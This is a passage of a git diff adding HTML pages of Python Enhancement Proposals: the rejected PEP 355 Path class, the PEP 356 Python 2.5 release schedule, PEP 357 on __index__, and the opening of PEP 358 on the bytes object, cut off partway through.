This PEP has been rejected (in this form). The proposed path class +is the ultimate kitchen sink; but the notion that it’s better to +implement all functionality that uses a path as a method on a single +class is an anti-pattern. (E.g. why not open()? Or execfile()?) +Subclassing from str is a particularly bad idea; many string +operations make no sense when applied to a path. This PEP has +lingered, and while the discussion flares up from time to time, +it’s time to put this PEP out of its misery. A less far-fetched +proposal might be more palatable.

+
+
+

Abstract

+

This PEP describes a new class, Path, to be added to the os +module, for handling paths in an object oriented fashion. The +“weak” deprecation of various related functions is also discussed +and recommended.

+
+
+

Background

+

The ideas expressed in this PEP are not recent, but have been +debated in the Python community for many years. Many have felt +that the API for manipulating file paths as offered in the os.path +module is inadequate. The first proposal for a Path object was +raised by Just van Rossum on python-dev in 2001 [2]. In 2003, +Jason Orendorff released version 1.0 of the “path module” which +was the first public implementation that used objects to represent +paths [3].

+

The path module quickly became very popular and numerous attempts +were made to get the path module included in the Python standard +library; [4], [5], [6], [7].

+

This PEP summarizes the ideas and suggestions people have +expressed about the path module and proposes that a modified +version should be included in the standard library.

+
+
+

Motivation

+

Dealing with filesystem paths is a common task in any programming +language, and very common in a high-level language like Python. +Good support for this task is needed, because:

+
    +
  • Almost every program uses paths to access files. It makes sense +that a task, that is so often performed, should be as intuitive +and as easy to perform as possible.
  • +
  • It makes Python an even better replacement language for +over-complicated shell scripts.
  • +
+

Currently, Python has a large number of different functions +scattered over half a dozen modules for handling paths. This +makes it hard for newbies and experienced developers to choose +the right method.

+

The Path class provides the following enhancements over the +current common practice:

+
    +
  • One “unified” object provides all functionality from previous +functions.
  • +
  • Subclassability - the Path object can be extended to support +paths other than filesystem paths. The programmer does not need +to learn a new API, but can reuse their knowledge of Path +to deal with the extended class.
  • +
  • With all related functionality in one place, the right approach +is easier to learn as one does not have to hunt through many +different modules for the right functions.
  • +
  • Python is an object oriented language. Just like files, +datetimes and sockets are objects so are paths, they are not +merely strings to be passed to functions. Path objects is +inherently a pythonic idea.
  • +
  • Path takes advantage of properties. Properties make for more +readable code:
    if imgpath.ext == 'jpg':
    +    jpegdecode(imgpath)
    +
    +
    +

    Is better than:

    +
    if os.path.splitexit(imgpath)[1] == 'jpg':
    +    jpegdecode(imgpath)
    +
    +
    +
  • +
+
+
+

Rationale

+

The following points summarize the design:

+
    +
  • Path extends from string, therefore all code which expects +string pathnames need not be modified and no existing code will +break.
  • +
  • A Path object can be created either by using the classmethod +Path.cwd, by instantiating the class with a string representing +a path or by using the default constructor which is equivalent +to Path(".").
  • +
  • Path provides common pathname manipulation, pattern expansion, +pattern matching and other high-level file operations including +copying. Basically Path provides everything path-related except +the manipulation of file contents, for which file objects are +better suited.
  • +
  • Platform incompatibilities are dealt with by not instantiating +system specific methods.
  • +
+
+
+

Specification

+

This class defines the following public interface (docstrings have +been extracted from the reference implementation, and shortened +for brevity; see the reference implementation for more detail):

+
class Path(str):
+
+    # Special Python methods:
+    def __new__(cls, *args) => Path
+        """
+        Creates a new path object concatenating the *args.  *args
+        may only contain Path objects or strings.  If *args is
+        empty, Path(os.curdir) is created.
+        """
+    def __repr__(self): ...
+    def __add__(self, more): ...
+    def __radd__(self, other): ...
+
+    # Alternative constructor.
+    def cwd(cls): ...
+
+    # Operations on path strings:
+    def abspath(self) => Path
+        """Returns the absolute path of self as a new Path object."""
+    def normcase(self): ...
+    def normpath(self): ...
+    def realpath(self): ...
+    def expanduser(self): ...
+    def expandvars(self): ...
+    def basename(self): ...
+    def expand(self): ...
+    def splitpath(self) => (Path, str)
+        """p.splitpath() -> Return (p.parent, p.name)."""
+    def stripext(self) => Path
+        """p.stripext() -> Remove one file extension from the path."""
+    def splitunc(self): ...  # See footnote [1]
+    def splitall(self): ...
+    def relpath(self): ...
+    def relpathto(self, dest): ...
+
+    # Properties about the path:
+    parent => Path
+        """This Path's parent directory as a new path object."""
+    name => str
+        """The name of this file or directory without the full path."""
+    ext => str
+        """
+        The file extension or an empty string if Path refers to a
+        file without an extension or a directory.
+        """
+    drive => str
+        """
+        The drive specifier.  Always empty on systems that don't
+        use drive specifiers.
+        """
+    namebase => str
+        """
+        The same as path.name, but with one file extension
+        stripped off.
+        """
+    uncshare[1]
+
+    # Operations that return lists of paths:
+    def listdir(self, pattern = None): ...
+    def dirs(self, pattern = None): ...
+    def files(self, pattern = None): ...
+    def walk(self, pattern = None): ...
+    def walkdirs(self, pattern = None): ...
+    def walkfiles(self, pattern = None): ...
+    def match(self, pattern) => bool
+        """Returns True if self.name matches the given pattern."""
+
+    def matchcase(self, pattern) => bool
+        """
+        Like match() but is guaranteed to be case sensitive even
+        on platforms with case insensitive filesystems.
+        """
+    def glob(self, pattern):
+
+    # Methods for retrieving information about the filesystem
+    # path:
+    def exists(self): ...
+    def isabs(self): ...
+    def isdir(self): ...
+    def isfile(self): ...
+    def islink(self): ...
+    def ismount(self): ...
+    def samefile(self, other): ...  # See footnote [1]
+    def atime(self): ...
+        """Last access time of the file."""
+    def mtime(self): ...
+        """Last-modified time of the file."""
+    def ctime(self): ...
+        """
+        Return the system's ctime which, on some systems (like
+        Unix) is the time of the last change, and, on others (like
+        Windows), is the creation time for path.
+        """
+    def size(self): ...
+    def access(self, mode): ...  # See footnote [1]
+    def stat(self): ...
+    def lstat(self): ...
+    def statvfs(self): ...  # See footnote [1]
+    def pathconf(self, name): ...  # See footnote [1]
+
+    # Methods for manipulating information about the filesystem
+    # path.
+    def utime(self, times) => None
+    def chmod(self, mode) => None
+    def chown(self, uid, gid) => None # See footnote [1]
+    def rename(self, new) => None
+    def renames(self, new) => None
+
+    # Create/delete operations on directories
+    def mkdir(self, mode = 0777): ...
+    def makedirs(self, mode = 0777): ...
+    def rmdir(self): ...
+    def removedirs(self): ...
+
+    # Modifying operations on files
+    def touch(self): ...
+    def remove(self): ...
+    def unlink(self): ...
+
+    # Modifying operations on links
+    def link(self, newpath): ...
+    def symlink(self, newlink): ...
+    def readlink(self): ...
+    def readlinkabs(self): ...
+
+    # High-level functions from shutil
+    def copyfile(self, dst): ...
+    def copymode(self, dst): ...
+    def copystat(self, dst): ...
+    def copy(self, dst): ...
+    def copy2(self, dst): ...
+    def copytree(self, dst, symlinks = True): ...
+    def move(self, dst): ...
+    def rmtree(self, ignore_errors = False, onerror = None): ...
+
+    # Special stuff from os
+    def chroot(self): ...  # See footnote [1]
+    def startfile(self): ...  # See footnote [1]
+
+
+
+
+

Replacing older functions with the Path class

+

In this section, “a ==> b” means that b can be used as a +replacement for a.

+

In the following examples, we assume that the Path class is +imported with from path import Path.

+
    +
  • Replacing os.path.join:
    os.path.join(os.getcwd(), "foobar")
    +==>
    +Path(Path.cwd(), "foobar")
    +
    +os.path.join("foo", "bar", "baz")
    +==>
    +Path("foo", "bar", "baz")
    +
    +
    +
  • +
  • Replacing os.path.splitext:
    fname = "Python2.4.tar.gz"
    +os.path.splitext(fname)[1]
    +==>
    +fname = Path("Python2.4.tar.gz")
    +fname.ext
    +
    +
    +

    Or if you want both parts:

    +
    fname = "Python2.4.tar.gz"
    +base, ext = os.path.splitext(fname)
    +==>
    +fname = Path("Python2.4.tar.gz")
    +base, ext = fname.namebase, fname.extx
    +
    +
    +
  • +
  • Replacing glob.glob:
    lib_dir = "/lib"
    +libs = glob.glob(os.path.join(lib_dir, "*s.o"))
    +==>
    +lib_dir = Path("/lib")
    +libs = lib_dir.files("*.so")
    +
    +
    +
  • +
+
+
+

Deprecations

+

Introducing this module to the standard library introduces a need +for the “weak” deprecation of a number of existing modules and +functions. These modules and functions are so widely used that +they cannot be truly deprecated, as in generating +DeprecationWarning. Here “weak deprecation” means notes in the +documentation only.

+

The table below lists the existing functionality that should be +deprecated.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Path method/propertyDeprecates function
normcase()os.path.normcase()
normpath()os.path.normpath()
realpath()os.path.realpath()
expanduser()os.path.expanduser()
expandvars()os.path.expandvars()
parentos.path.dirname()
nameos.path.basename()
splitpath()os.path.split()
driveos.path.splitdrive()
extos.path.splitext()
splitunc()os.path.splitunc()
__new__()os.path.join(), os.curdir
listdir()os.listdir() [fnmatch.filter()]
match()fnmatch.fnmatch()
matchcase()fnmatch.fnmatchcase()
glob()glob.glob()
exists()os.path.exists()
isabs()os.path.isabs()
isdir()os.path.isdir()
isfile()os.path.isfile()
islink()os.path.islink()
ismount()os.path.ismount()
samefile()os.path.samefile()
atime()os.path.getatime()
ctime()os.path.getctime()
mtime()os.path.getmtime()
size()os.path.getsize()
cwd()os.getcwd()
access()os.access()
stat()os.stat()
lstat()os.lstat()
statvfs()os.statvfs()
pathconf()os.pathconf()
utime()os.utime()
chmod()os.chmod()
chown()os.chown()
rename()os.rename()
renames()os.renames()
mkdir()os.mkdir()
makedirs()os.makedirs()
rmdir()os.rmdir()
removedirs()os.removedirs()
remove()os.remove()
unlink()os.unlink()
link()os.link()
symlink()os.symlink()
readlink()os.readlink()
chroot()os.chroot()
startfile()os.startfile()
copyfile()shutil.copyfile()
copymode()shutil.copymode()
copystat()shutil.copystat()
copy()shutil.copy()
copy2()shutil.copy2()
copytree()shutil.copytree()
move()shutil.move()
rmtree()shutil.rmtree()
+

The Path class deprecates the whole of os.path, shutil, fnmatch +and glob. A big chunk of os is also deprecated.

+
+
+

Closed Issues

+

A number contentious issues have been resolved since this PEP +first appeared on python-dev:

+
    +
  • The __div__() method was removed. Overloading the / (division) +operator may be “too much magic” and make path concatenation +appear to be division. The method can always be re-added later +if the BDFL so desires. In its place, __new__() got an *args +argument that accepts both Path and string objects. The *args +are concatenated with os.path.join() which is used to construct +the Path object. These changes obsoleted the problematic +joinpath() method which was removed.
  • +
  • The methods and the properties getatime()/atime, +getctime()/ctime, getmtime()/mtime and getsize()/size duplicated +each other. These methods and properties have been merged to +atime(), ctime(), mtime() and size(). The reason they are not +properties instead, is because there is a possibility that they +may change unexpectedly. The following example is not +guaranteed to always pass the assertion:
    p = Path("foobar")
    +s = p.size()
    +assert p.size() == s
    +
    +
    +
  • +
+
+
+

Open Issues

+

Some functionality of Jason Orendorff’s path module have been +omitted:

+
    +
  • Function for opening a path - better handled by the builtin +open().
  • +
  • Functions for reading and writing whole files - better handled +by file objects’ own read() and write() methods.
  • +
  • A chdir() function may be a worthy inclusion.
  • +
  • A deprecation schedule needs to be set up. How much +functionality should Path implement? How much of existing +functionality should it deprecate and when?
  • +
  • The name obviously has to be either “path” or “Path,” but where +should it live? In its own module or in os?
  • +
  • Due to Path subclassing either str or unicode, the following +non-magic, public methods are available on Path objects:
    capitalize(), center(), count(), decode(), encode(),
    +endswith(), expandtabs(), find(), index(), isalnum(),
    +isalpha(), isdigit(), islower(), isspace(), istitle(),
    +isupper(), join(), ljust(), lower(), lstrip(), replace(),
    +rfind(), rindex(), rjust(), rsplit(), rstrip(), split(),
    +splitlines(), startswith(), strip(), swapcase(), title(),
    +translate(), upper(), zfill()
    +
    +
    +

    On python-dev it has been argued whether this inheritance is +sane or not. Most persons debating said that most string +methods doesn’t make sense in the context of filesystem paths – +they are just dead weight. The other position, also argued on +python-dev, is that inheriting from string is very convenient +because it allows code to “just work” with Path objects without +having to be adapted for them.

    +

    One of the problems is that at the Python level, there is no way +to make an object “string-like enough,” so that it can be passed +to the builtin function open() (and other builtins expecting a +string or buffer), unless the object inherits from either str or +unicode. Therefore, to not inherit from string requires changes +in CPython’s core.

    +
  • +
+

The functions and modules that this new module is trying to +replace (os.path, shutil, fnmatch, glob and parts of os) are +expected to be available in future Python versions for a long +time, to preserve backwards compatibility.

+
+
+

Reference Implementation

+

Currently, the Path class is implemented as a thin wrapper around +the standard library modules fnmatch, glob, os, os.path and +shutil. The intention of this PEP is to move functionality from +the aforementioned modules to Path while they are being +deprecated.

+

For more detail and an implementation see:

+
+
+
+
+

Examples

+

In this section, “a ==> b” means that b can be used as a +replacement for a.

+
    +
  • Make all python files in the a directory executable:
    DIR = '/usr/home/guido/bin'
    +for f in os.listdir(DIR):
    +    if f.endswith('.py'):
    +        path = os.path.join(DIR, f)
    +        os.chmod(path, 0755)
    +==>
    +for f in Path('/usr/home/guido/bin').files("*.py"):
    +    f.chmod(0755)
    +
    +
    +
  • +
  • Delete emacs backup files:
    def delete_backups(arg, dirname, names):
    +    for name in names:
    +        if name.endswith('~'):
    +            os.remove(os.path.join(dirname, name))
    +os.path.walk(os.environ['HOME'], delete_backups, None)
    +==>
    +d = Path(os.environ['HOME'])
    +for f in d.walkfiles('*~'):
    +    f.remove()
    +
    +
    +
  • +
  • Finding the relative path to a file:
    b = Path('/users/peter/')
    +a = Path('/users/peter/synergy/tiki.txt')
    +a.relpathto(b)
    +
    +
    +
  • +
  • Splitting a path into directory and filename:
    os.path.split("/path/to/foo/bar.txt")
    +==>
    +Path("/path/to/foo/bar.txt").splitpath()
    +
    +
    +
  • +
  • List all Python scripts in the current directory tree:
    list(Path().walkfiles("*.py"))
    +
    +
    +
  • +
+
+
+

References and Footnotes

+

[1] Method is not guaranteed to be available on all platforms.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0355.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0356/index.html b/pep-0356/index.html new file mode 100644 index 00000000000..96cf591767d --- /dev/null +++ b/pep-0356/index.html @@ -0,0 +1,297 @@ + + + + + + + + PEP 356 – Python 2.5 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 356 – Python 2.5 Release Schedule

+
+
Author:
+
Neal Norwitz, Guido van Rossum, Anthony Baxter
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
07-Feb-2006
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.5. The schedule primarily concerns itself with PEP-sized +items. Small features may be added up to and including the first +beta release. Bugs may be fixed until the final release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. The release date is planned for +12 September 2006.

+
+
+

Release Manager

+
    +
  • Anthony Baxter has volunteered to be Release Manager.
  • +
  • Martin von Loewis is building the Windows installers,
  • +
  • Ronald Oussoren is building the Mac installers,
  • +
  • Fred Drake the doc packages and
  • +
  • Sean Reifschneider the RPMs.
  • +
+
+
+

Release Schedule

+
    +
  • alpha 1: April 5, 2006 [completed]
  • +
  • alpha 2: April 27, 2006 [completed]
  • +
  • beta 1: June 20, 2006 [completed]
  • +
  • beta 2: July 11, 2006 [completed]
  • +
  • beta 3: August 3, 2006 [completed]
  • +
  • rc 1: August 17, 2006 [completed]
  • +
  • rc 2: September 12, 2006 [completed]
  • +
  • final: September 19, 2006 [completed]
  • +
+
+
+

Completed features for 2.5

+
    +
  • PEP 308: Conditional Expressions
  • +
  • PEP 309: Partial Function Application
  • +
  • PEP 314: Metadata for Python Software Packages v1.1
  • +
  • PEP 328: Absolute/Relative Imports
  • +
  • PEP 338: Executing Modules as Scripts
  • +
  • PEP 341: Unified try-except/try-finally to try-except-finally
  • +
  • PEP 342: Coroutines via Enhanced Generators
  • +
  • PEP 343: The “with” Statement (still need updates in Doc/ref and for the +contextlib module)
  • +
  • PEP 352: Required Superclass for Exceptions
  • +
  • PEP 353: Using ssize_t as the index type
  • +
  • PEP 357: Allowing Any Object to be Used for Slicing
  • +
  • ASCII became the default coding
  • +
  • AST-based compiler
  • +
  • Access to C AST from Python through new _ast module
  • +
  • any()/all() builtin truth functions
  • +
+

New standard library modules:

+
    +
  • cProfile – suitable for profiling long running applications +with minimal overhead
  • +
  • ctypes – optional component of the windows installer
  • +
  • ElementTree and cElementTree – by Fredrik Lundh
  • +
  • hashlib – adds support for SHA-224, -256, -384, and -512 +(replaces old md5 and sha modules)
  • +
  • msilib – for creating MSI files and bdist_msi in distutils.
  • +
  • pysqlite
  • +
  • uuid
  • +
  • wsgiref
  • +
+

Other notable features:

+
    +
  • Added support for reading shadow passwords [1]
  • +
  • Added support for the Unicode 4.1 UCD
  • +
  • Added PEP 302 zipfile/__loader__ support to the following modules: +warnings, linecache, inspect, traceback, site, and +doctest
  • +
  • Added pybench Python benchmark suite – by Marc-Andre Lemburg
  • +
  • Add write support for mailboxes from the code in sandbox/mailbox. +(Owner: A.M. Kuchling. It would still be good if another person +would take a look at the new code.)
  • +
  • Support for building “fat” Mac binaries (Intel and PPC)
  • +
  • Add new icons for Windows with the new Python logo?
  • +
  • New utilities in functools to help write wrapper functions that +support naive introspection (e.g. having f.__name__ return +the original function name).
  • +
  • Upgrade pyexpat to use expat 2.0.
  • +
  • Python core now compiles cleanly with g++
  • +
+
+
+

Possible features for 2.5

+

Each feature below should implemented prior to beta1 or +will require BDFL approval for inclusion in 2.5.

+
    +
  • Modules under consideration for inclusion:
  • +
  • Add new icons for MacOS and Unix with the new Python logo? +(Owner: ???) +MacOS: http://hcs.harvard.edu/~jrus/python/prettified-py-icons.png
  • +
  • Check the various bits of code in Demo/ all still work, update or +remove the ones that don’t. +(Owner: Anthony)
  • +
  • All modules in Modules/ should be updated to be ssize_t clean. +(Owner: Neal)
  • +
+
+
+

Deferred until 2.6

+
    +
  • bdist_deb in distutils package [2]
  • +
  • bdist_egg in distutils package
  • +
  • pure python pgen module +(Owner: Guido)
  • +
  • Remove the fpectl module?
  • +
  • Make everything in Modules/ build cleanly with g++
  • +
+
+
+

Open issues

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0356.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0357/index.html b/pep-0357/index.html new file mode 100644 index 00000000000..1efe8b02670 --- /dev/null +++ b/pep-0357/index.html @@ -0,0 +1,349 @@ + + + + + + + + PEP 357 – Allowing Any Object to be Used for Slicing | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 357 – Allowing Any Object to be Used for Slicing

+
+
Author:
+
Travis Oliphant <oliphant at ee.byu.edu>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2006
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an nb_index slot in PyNumberMethods and an +__index__ special method so that arbitrary objects can be used +whenever integers are explicitly needed in Python, such as in slice +syntax (from which the slot gets its name).

+
+
+

Rationale

+

Currently integers and long integers play a special role in +slicing in that they are the only objects allowed in slice +syntax. In other words, if X is an object implementing the +sequence protocol, then X[obj1:obj2] is only valid if obj1 and +obj2 are both integers or long integers. There is no way for obj1 +and obj2 to tell Python that they could be reasonably used as +indexes into a sequence. This is an unnecessary limitation.

+

In NumPy, for example, there are 8 different integer scalars +corresponding to unsigned and signed integers of 8, 16, 32, and 64 +bits. These type-objects could reasonably be used as integers in +many places where Python expects true integers but cannot inherit from +the Python integer type because of incompatible memory layouts. +There should be some way to be able to tell Python that an object can +behave like an integer.

+

It is not possible to use the nb_int (and __int__ special method) +for this purpose because that method is used to coerce objects +to integers. It would be inappropriate to allow every object that +can be coerced to an integer to be used as an integer everywhere +Python expects a true integer. For example, if __int__ were used +to convert an object to an integer in slicing, then float objects +would be allowed in slicing and x[3.2:5.8] would not raise an error +as it should.

+
+
+

Proposal

+

Add an nb_index slot to PyNumberMethods, and a corresponding +__index__ special method. Objects could define a function to +place in the nb_index slot that returns a Python integer +(either an int or a long). This integer can +then be appropriately converted to a Py_ssize_t value whenever +Python needs one such as in PySequence_GetSlice, +PySequence_SetSlice, and PySequence_DelSlice.

+
+
+

Specification

+
    +
  1. The nb_index slot will have the following signature:
    PyObject *index_func (PyObject *self)
    +
    +
    +

    The returned object must be a Python IntType or +Python LongType. NULL should be returned on +error with an appropriate error set.

    +
  2. +
  3. The __index__ special method will have the signature:
    def __index__(self):
    +    return obj
    +
    +
    +

    where obj must be either an int or a long.

    +
  4. +
  5. 3 new abstract C-API functions will be added
      +
    1. The first checks to see if the object supports the index +slot and if it is filled in.
      int PyIndex_Check(obj)
      +
      +
      +

      This will return true if the object defines the nb_index +slot.

      +
    2. +
    3. The second is a simple wrapper around the nb_index call that +raises PyExc_TypeError if the call is not available or if it +doesn’t return an int or long. Because the +PyIndex_Check is performed inside the PyNumber_Index call +you can call it directly and manage any error rather than +check for compatibility first.
      PyObject *PyNumber_Index (PyObject *obj)
      +
      +
      +
    4. +
    5. The third call helps deal with the common situation of +actually needing a Py_ssize_t value from the object to use for +indexing or other needs.
      Py_ssize_t PyNumber_AsSsize_t(PyObject *obj, PyObject *exc)
      +
      +
      +

      The function calls the nb_index slot of obj if it is +available and then converts the returned Python integer into +a Py_ssize_t value. If this goes well, then the value is +returned. The second argument allows control over what +happens if the integer returned from nb_index cannot fit +into a Py_ssize_t value.

      +

      If exc is NULL, then the returned value will be clipped to +PY_SSIZE_T_MAX or PY_SSIZE_T_MIN depending on whether the +nb_index slot of obj returned a positive or negative +integer. If exc is non-NULL, then it is the error object +that will be set to replace the PyExc_OverflowError that was +raised when the Python integer or long was converted to Py_ssize_t.

      +
    6. +
    +
  6. +
  7. A new operator.index(obj) function will be added that calls +equivalent of obj.__index__() and raises an error if obj does not implement +the special method.
  8. +
+
+
+

Implementation Plan

+
    +
  1. Add the nb_index slot in object.h and modify typeobject.c to +create the __index__ method
  2. +
  3. Change the ISINT macro in ceval.c to ISINDEX and alter it to +accommodate objects with the index slot defined.
  4. +
  5. Change the _PyEval_SliceIndex function to accommodate objects +with the index slot defined.
  6. +
  7. Change all builtin objects (e.g. lists) that use the as_mapping +slots for subscript access and use a special-check for integers to +check for the slot as well.
  8. +
  9. Add the nb_index slot to integers and long_integers +(which just return themselves)
  10. +
  11. Add PyNumber_Index C-API to return an integer from any +Python Object that has the nb_index slot.
  12. +
  13. Add the operator.index(x) function.
  14. +
  15. Alter arrayobject.c and mmapmodule.c to use the new C-API for their +sub-scripting and other needs.
  16. +
  17. Add unit-tests
  18. +
+
+
+

Discussion Questions

+
+

Speed

+

Implementation should not slow down Python because integers and long +integers used as indexes will complete in the same number of +instructions. The only change will be that what used to generate +an error will now be acceptable.

+
+
+

Why not use nb_int which is already there?

+

The nb_int method is used for coercion and so means something +fundamentally different than what is requested here. This PEP +proposes a method for something that can already be thought of as +an integer communicate that information to Python when it needs an +integer. The biggest example of why using nb_int would be a bad +thing is that float objects already define the nb_int method, but +float objects should not be used as indexes in a sequence.

+
+
+

Why the name __index__?

+

Some questions were raised regarding the name __index__ when other +interpretations of the slot are possible. For example, the slot +can be used any time Python requires an integer internally (such +as in "mystring" * 3). The name was suggested by Guido because +slicing syntax is the biggest reason for having such a slot and +in the end no better name emerged. See the discussion thread [1] +for examples of names that were suggested such as “__discrete__” and +“__ordinal__”.

+
+
+

Why return PyObject * from nb_index?

+

Initially Py_ssize_t was selected as the return type for the +nb_index slot. However, this led to an inability to track and +distinguish overflow and underflow errors without ugly and brittle +hacks. As the nb_index slot is used in at least 3 different ways +in the Python core (to get an integer, to get a slice end-point, +and to get a sequence index), there is quite a bit of flexibility +needed to handle all these cases. The importance of having the +necessary flexibility to handle all the use cases is critical. +For example, the initial implementation that returned Py_ssize_t for +nb_index led to the discovery that on a 32-bit machine with >=2GB of RAM +s = 'x' * (2**100) works but len(s) was clipped at 2147483647. +Several fixes were suggested but eventually it was decided that +nb_index needed to return a Python Object similar to the nb_int +and nb_long slots in order to handle overflow correctly.

+
+
+

Why can’t __index__ return any object with the nb_index method?

+

This would allow infinite recursion in many different ways that are not +easy to check for. This restriction is similar to the requirement that +__nonzero__ return an int or a bool.

+
+
+
+

Reference Implementation

+

Submitted as patch 1436368 to SourceForge.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0357.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0358/index.html b/pep-0358/index.html new file mode 100644 index 00000000000..9b267da9d70 --- /dev/null +++ b/pep-0358/index.html @@ -0,0 +1,372 @@ + + + + + + + + PEP 358 – The “bytes” Object | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 358 – The “bytes” Object

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Feb-2006
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Update

+

This PEP has partially been superseded by PEP 3137.

+
+
+

Abstract

+

This PEP outlines the introduction of a raw bytes sequence type. +Adding the bytes type is one step in the transition to +Unicode-based str objects which will be introduced in Python 3.0.

+

The PEP describes how the bytes type should work in Python 2.6, as +well as how it should work in Python 3.0. (Occasionally there are +differences because in Python 2.6, we have two string types, str +and unicode, while in Python 3.0 we will only have one string +type, whose name will be str but whose semantics will be like the +2.6 unicode type.)

+
+
+

Motivation

+

Python’s current string objects are overloaded. They serve to hold +both sequences of characters and sequences of bytes. This +overloading of purpose leads to confusion and bugs. In future +versions of Python, string objects will be used for holding +character data. The bytes object will fulfil the role of a byte +container. Eventually the unicode type will be renamed to str +and the old str type will be removed.

+
+
+

Specification

+

A bytes object stores a mutable sequence of integers that are in +the range 0 to 255. Unlike string objects, indexing a bytes +object returns an integer. Assigning or comparing an object that +is not an integer to an element causes a TypeError exception. +Assigning an element to a value outside the range 0 to 255 causes +a ValueError exception. The .__len__() method of bytes returns +the number of integers stored in the sequence (i.e. the number of +bytes).

+

The constructor of the bytes object has the following signature:

+
bytes([initializer[, encoding]])
+
+
+

If no arguments are provided then a bytes object containing zero +elements is created and returned. The initializer argument can be +a string (in 2.6, either str or unicode), an iterable of integers, +or a single integer. The pseudo-code for the constructor +(optimized for clear semantics, not for speed) is:

+
def bytes(initializer=0, encoding=None):
+    if isinstance(initializer, int): # In 2.6, int -> (int, long)
+        initializer = [0]*initializer
+    elif isinstance(initializer, basestring):
+        if isinstance(initializer, unicode): # In 3.0, "if True"
+            if encoding is None:
+                # In 3.0, raise TypeError("explicit encoding required")
+                encoding = sys.getdefaultencoding()
+            initializer = initializer.encode(encoding)
+        initializer = [ord(c) for c in initializer]
+    else:
+        if encoding is not None:
+            raise TypeError("no encoding allowed for this initializer")
+        tmp = []
+        for c in initializer:
+            if not isinstance(c, int):
+                raise TypeError("initializer must be iterable of ints")
+            if not 0 <= c < 256:
+                raise ValueError("initializer element out of range")
+            tmp.append(c)
+        initializer = tmp
+    new = <new bytes object of length len(initializer)>
+    for i, c in enumerate(initializer):
+        new[i] = c
+    return new
+
+
+

The .__repr__() method returns a string that can be evaluated to +generate a new bytes object containing a bytes literal:

+
>>> bytes([10, 20, 30])
+b'\n\x14\x1e'
+
+
+

The object has a .decode() method equivalent to the .decode() +method of the str object. The object has a classmethod .fromhex() +that takes a string of characters from the set [0-9a-fA-F ] and +returns a bytes object (similar to binascii.unhexlify). For +example:

+
>>> bytes.fromhex('5c5350ff')
+b'\\SP\xff'
+>>> bytes.fromhex('5c 53 50 ff')
+b'\\SP\xff'
+
+
+

The object has a .hex() method that does the reverse conversion +(similar to binascii.hexlify):

+
>> bytes([92, 83, 80, 255]).hex()
+'5c5350ff'
+
+
+

The bytes object has some methods similar to list methods, and +others similar to str methods. Here is a complete list of +methods, with their approximate signatures:

+
.__add__(bytes) -> bytes
+.__contains__(int | bytes) -> bool
+.__delitem__(int | slice) -> None
+.__delslice__(int, int) -> None
+.__eq__(bytes) -> bool
+.__ge__(bytes) -> bool
+.__getitem__(int | slice) -> int | bytes
+.__getslice__(int, int) -> bytes
+.__gt__(bytes) -> bool
+.__iadd__(bytes) -> bytes
+.__imul__(int) -> bytes
+.__iter__() -> iterator
+.__le__(bytes) -> bool
+.__len__() -> int
+.__lt__(bytes) -> bool
+.__mul__(int) -> bytes
+.__ne__(bytes) -> bool
+.__reduce__(...) -> ...
+.__reduce_ex__(...) -> ...
+.__repr__() -> str
+.__reversed__() -> bytes
+.__rmul__(int) -> bytes
+.__setitem__(int | slice, int | iterable[int]) -> None
+.__setslice__(int, int, iterable[int]) -> Bote
+.append(int) -> None
+.count(int) -> int
+.decode(str) -> str | unicode # in 3.0, only str
+.endswith(bytes) -> bool
+.extend(iterable[int]) -> None
+.find(bytes) -> int
+.index(bytes | int) -> int
+.insert(int, int) -> None
+.join(iterable[bytes]) -> bytes
+.partition(bytes) -> (bytes, bytes, bytes)
+.pop([int]) -> int
+.remove(int) -> None
+.replace(bytes, bytes) -> bytes
+.rindex(bytes | int) -> int
+.rpartition(bytes) -> (bytes, bytes, bytes)
+.split(bytes) -> list[bytes]
+.startswith(bytes) -> bool
+.reverse() -> None
+.rfind(bytes) -> int
+.rindex(bytes | int) -> int
+.rsplit(bytes) -> list[bytes]
+.translate(bytes, [bytes]) -> bytes
+
+
+

Note the conspicuous absence of .isupper(), .upper(), and friends. +(But see “Open Issues” below.) There is no .__hash__() because +the object is mutable. There is no use case for a .sort() method.

+

The bytes type also supports the buffer interface, supporting +reading and writing binary (but not character) data.

+
+
+

Out of Scope Issues

+
    +
